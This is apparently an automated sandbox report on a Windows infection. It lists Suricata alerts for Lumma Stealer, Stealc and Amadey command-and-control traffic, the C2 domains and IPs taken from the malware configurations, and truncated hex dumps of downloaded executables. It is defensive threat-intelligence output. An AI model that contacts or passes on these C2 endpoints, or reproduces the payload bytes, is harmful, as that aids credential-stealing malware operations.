                                  Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49818 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49819 -> 135.181.65.216:80
                                  Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49826 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49819 -> 135.181.65.216:80
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49842 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 135.181.65.216:80 -> 192.168.2.4:49819
                                  Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49861 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49819 -> 135.181.65.216:80
                                  Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49883 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2058622 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) : 192.168.2.4:59164 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2058623 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI) : 192.168.2.4:49898 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2058623 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI) : 192.168.2.4:49913 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 135.181.65.216:80 -> 192.168.2.4:49819
                                  Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49931 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49819 -> 135.181.65.216:80
                                  Source: Network trafficSuricata IDS: 2058623 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI) : 192.168.2.4:49934 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2058623 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI) : 192.168.2.4:49945 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49884 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49837 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2058623 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI) : 192.168.2.4:49955 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49957 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49910 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2058623 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI) : 192.168.2.4:49974 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49971 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2058623 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI) : 192.168.2.4:49988 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2058623 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rabidcowse .shop in TLS SNI) : 192.168.2.4:50004 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50061 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50064 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50066 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50065 -> 185.215.113.206:80
                                  Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:50065 -> 185.215.113.206:80
                                  Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:50065
                                  Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:50065 -> 185.215.113.206:80
                                  Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:50065
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50068 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:50065 -> 185.215.113.206:80
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50085 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49818 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49818 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49910 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49913 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49913 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49826 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49826 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49898 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49898 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49934 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50004 -> 172.67.156.127:443
                                  C2 URLs / IPs found in malware configuration
                                  Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                                  Source: Malware configuration extractorURLs: energyaffai.lat
                                  Source: Malware configuration extractorURLs: discokeyus.lat
                                  Source: Malware configuration extractorURLs: sustainskelet.lat
                                  Source: Malware configuration extractorURLs: aspecteirs.lat
                                  Source: Malware configuration extractorURLs: rapeflowwj.lat
                                  Source: Malware configuration extractorURLs: necklacebudi.lat
                                  Source: Malware configuration extractorURLs: grannyejh.lat
                                  Source: Malware configuration extractorURLs: crosshuaht.lat
                                  Source: Malware configuration extractorURLs: pancakedipyps.click
                                  Source: Malware configuration extractorIPs: 185.215.113.16
                                  Source: Malware configuration extractorURLs: home.fortth14vs.top
                                  Source: Malware configuration extractorURLs: .forhttpvs.top
                                  Source: Malware configuration extractorURLs: indohome.fortth14vs.top
                                  Source: Malware configuration extractorURLs: wgPhome.fortth14vs.top
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 03 Jan 2025 08:50:03 GMTContent-Type: application/octet-streamContent-Length: 776832Last-Modified: Tue, 17 Dec 2024 11:09:59 GMTConnection: keep-aliveETag: "67615c07-bda80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 9c 04 00 00 d0 02 00 00 9c 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 9c 04 00 00 70 07 00 00 9c 04 00 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 03 Jan 2025 08:50:06 GMTContent-Type: application/octet-streamContent-Length: 439808Last-Modified: Fri, 08 Nov 2024 07:05:53 GMTConnection: keep-aliveETag: "672db851-6b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 51 b8 2d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f4 04 00 00 00 02 00 00 00 00 00 d7 a1 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c4 45 00 00 bc e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 e2 05 00 18 00 00 00 f8 e1 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0a f3 04 00 00 10 00 00 00 f4 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 48 01 00 00 10 05 00 00 4a 01 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 42 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c4 45 00 00 00 e0 06 00 00 46 00 00 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 03 Jan 2025 08:50:08 GMTContent-Type: application/octet-streamContent-Length: 245760Last-Modified: Tue, 24 Dec 2024 21:07:16 GMTConnection: keep-aliveETag: "676b2284-3c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a4 f0 6a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 46 22 00 00 00 00 00 d0 1b 02 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 25 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 66 03 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 7c 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1a 95 02 00 00 10 00 00 00 96 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ac bb 00 00 00 b0 02 00 00 bc 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 2b 21 00 00 70 03 00 00 0c 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 00 5d 00 00 00 a0 24 00 00 5e 00 00 00 62 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 03 Jan 2025 08:50:10 GMTContent-Type: application/octet-streamContent-Length: 926760Last-Modified: Sun, 29 Dec 2024 05:25:36 GMTConnection: keep-aliveETag: "6770dd50-e2428"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 b9 e8 6f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 26 03 00 00 60 01 00 00 00 00 00 80 6e 01 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 0e 00 00 08 00 00 fc 44 0e 00 03 00 40 c2 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 16 04 00 3c 00 00 00 00 a0 04 00 cb 04 00 00 00 00 00 00 00 00 00 00 00 fe 0d 00 28 26 00 00 00 b0 04 00 24 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d3 03 00 18 00 00 00 38 5e 03 00 c0 00 00 00 00 00 00 00 00 00 00 00 b4 17 04 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3a 24 03 00 00 10 00 00 00 26 03 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bc 03 01 00 00 40 03 00 00 04 01 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e0 3a 00 00 00 50 04 00 00 2c 00 00 00 32 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 04 00 00 02 00 00 00 5e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 cb 04 00 00 00 a0 04 00 00 06 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 24 27 00 00 00 b0 04 00 00 28 00 00 00 66 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 b8 04 00 00 e0 04 00 00 b8 04 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 b8 04 00 00 a0 09 00 00 b8 04 00 00 46 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 08:50:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 